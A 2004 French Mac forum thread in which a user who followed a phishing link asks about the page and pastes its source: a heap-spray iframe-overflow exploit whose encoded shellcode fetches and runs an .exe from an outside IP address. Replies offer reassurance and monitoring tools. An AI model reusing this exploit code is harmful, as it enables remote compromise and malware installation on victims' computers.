Aide - Recherche - Membres - Calendrier
Version complète : Cheval de troie sur OS X
Forums MacBidouille > Général > Mac OS X / OS X
devisu
Salutatous,

Normalement sous Mac et OS X on est a l'abris des chevaux de troie et autres virus.

Je recois (comme vous ph34r.gif ) plein de spam ou arnaques.
Je vais beaucoups sur ebay et je recoit régulierement des fausses demandes d'info ou de confirmation de comptes dans le but de soutirer des infos comme n° de CB ou autres...
mad.gif
Bon passons.

Aujourd'hui je recois un mail "d'un autre membre de ebay" me parlant d'un payment paypal bien recu... C'est une ereure et cela ne me concerne pas donc je clique sur le bouton html "respond now" (pas le bouton répondre de Mail, celui du msg).
Je suis renvoyé sur Safari et
"http://66.188.0.39:2333/ViewItemnumber1511799626category52646.html"
Donc pas sur Ebay, le mail est un faux dans le but de me tromper.
mad.gif mad.gif mad.gif
Là ou cela devient interessant c'est que cela ouvre mon disque dure !!! blink.gif
La page en question reste blanche mais qque seconde apres mon DD s'ouvre et passe au premier plan alors que j'ai rien touché !
J'ai tenté l'experience plusieurs fois !
sad.gif
J'ai été cherché le code source de cette page :

<html><head><script language="javascript">
shellcode = unescape("%u4343%u4343%uEB43%u5643%u8B57%u3C45%u548B%u7828%uD503%u8B52%u
2052%uD503%uC033%uC933%u8B41%u8A34%uF503%uFF33%uCFC1%uAC13%uF803%uC085
%uF675%uFB3B%uEA75%u8B5A%u245A%uDD03%u8B66%u4B0C%u5A8B%u031C%u8BDD%u8
B04%uC503%u5E5F%uE0FF%u8C66%uA8D8%u7404%u333C%u64C0%u00A1%u0000%u8100%
u0478%u0000%u7000%u0473%u008B%uF3EB%u408B%u6604%uC02B%u8166%u4D38%u745A
%u2D07%u0000%u0001%uF2EB%u508B%u663C%u3C81%u5002%u0F45%uA985%u0000%u8B
00%uEBE8%u3311%uFCC0%u8B64%u3040%u408B%u8B0C%u1C70%u8BAD%u0868%uC481%
uFE50%uFFFF%uF48B%u6856%u0096%u0000%u79BB%uE741%uE888%uFF51%uFFFF%uD68B%
uC033%u0BAC%u75C0%uC7FB%uFF46%u3630%u3636%u46C7%u2E03%u7865%uC665%u0746
%u8B00%u33F2%u66C0%u6CB8%u506C%u6F68%u2E6E%u6864%u7275%u6D6C%uBB54%uA7
71%uFEE8%u18E8%uFFFF%u8BFF%u8BFD%uE8E8%u0000%u0000%u815A%uF8EA%u4010%u6
A00%u6A00%u5600%u928D%u1135%u0040%u6A52%uBB00%uC07D%u8318%uF0E8%uFFFE%
u6AFF%u5601%uEF8B%uE0BB%u76DC%uE850%uFEE1%uFFFF%u006A%u69BB%u421D%uE83A
%uFED5%uFFFF%u08C2%u6800%u7474%u3A70%u2F2F%u3636%u312E%u3838%u302E%u332E
%u3A39%u3332%u3333%u6D2F%u7473%u7361%u736B%u652E%u6578%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u00
00%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u
0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000
%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%uBB00%u01FD%u0000%u00
6A%u8068%u0000%u6A00%u6A03%u6A00%u6801%u0000%u8000%u0068%u4030%uE800%u
013A%u0000%u6850");
bigblock = unescape("%u0D0D%u0D0D"); headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();i=0;
while (i<699){ memory[i] = block + shellcode ; i++; }
</script></head><body>
<iframe src=file:/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBB

name="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC??"></iframe>
</body></html>

rolleyes.gif
Si ca vous parle dites le moi...

Ce qui m'inquiette c'est qu'une page html arrive a prendre control de mon ordi.
J'espere que en ce moment même j'ai pas ouvert toutes les portes (heureusement j'ai un routeur avec firewall...) ou qu'on scan mon DD !!!! unsure.gif mad.gif mad.gif

Je vais tout fermer et redémarer par aqui de conscience...
poj
blink.gif

Installe "MenuMeters" ferme tout et observe le débit...
f_cam
Pas de crainte à avoir, c'est un truc vieux comme le monde. Les liens en file:/// pointent sur le disque dur, mais pas via le web, ca dit juste au navigateur de regarder a cet endroit sur le disque dur.
Cependant la page web n'a aucun accès aux fichiers n'y rien d'autre.
le_mackeux
POur savoir s'il y a effectivement de la malice, installe LittleSnitch, versiontracker.com. Le logiciel te demande si un ligiciel (ou qu'importe) peut ouvrir une connection ver l'extérieur. Après l'installation, reclique sur le lien et tu verras si quelque chose ouvre une connection. Il est possible que la page télécharge untiquement un ex.cutable cgi comme bien des sites de piratages ont.



Bonne change.


Yuki
Ceci dit, si tu vois que le mail ne te concerne pas, ne daigne pas de répondre : plonk, poubelle.

Lorsque t'as le moindre doute sur un mail, atomise-le !
devisu
QUOTE(poj @ 5 Dec 2004, 20:46)
blink.gif

Installe "MenuMeters" ferme tout et observe le débit...
[right][snapback]941367[/snapback][/right]


vi vi vi, fait et tout vas bien....

QUOTE
Pas de crainte à avoir, c'est un truc vieux comme le monde. Les liens en file:/// pointent sur le disque dur, mais pas via le web, ca dit juste au navigateur de regarder a cet endroit sur le disque dur.
Cependant la page web n'a aucun accès aux fichiers n'y rien d'autre.


Merci smile.gif

C'est ce que je suspectais, mais bon j'aime pas quand des apli font des truc tout seul ! mad.gif mad.gif mad.gif
Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'informations, la mise en page et les images, veuillez cliquer ici.
Invision Power Board © 2001-2014 Invision Power Services, Inc.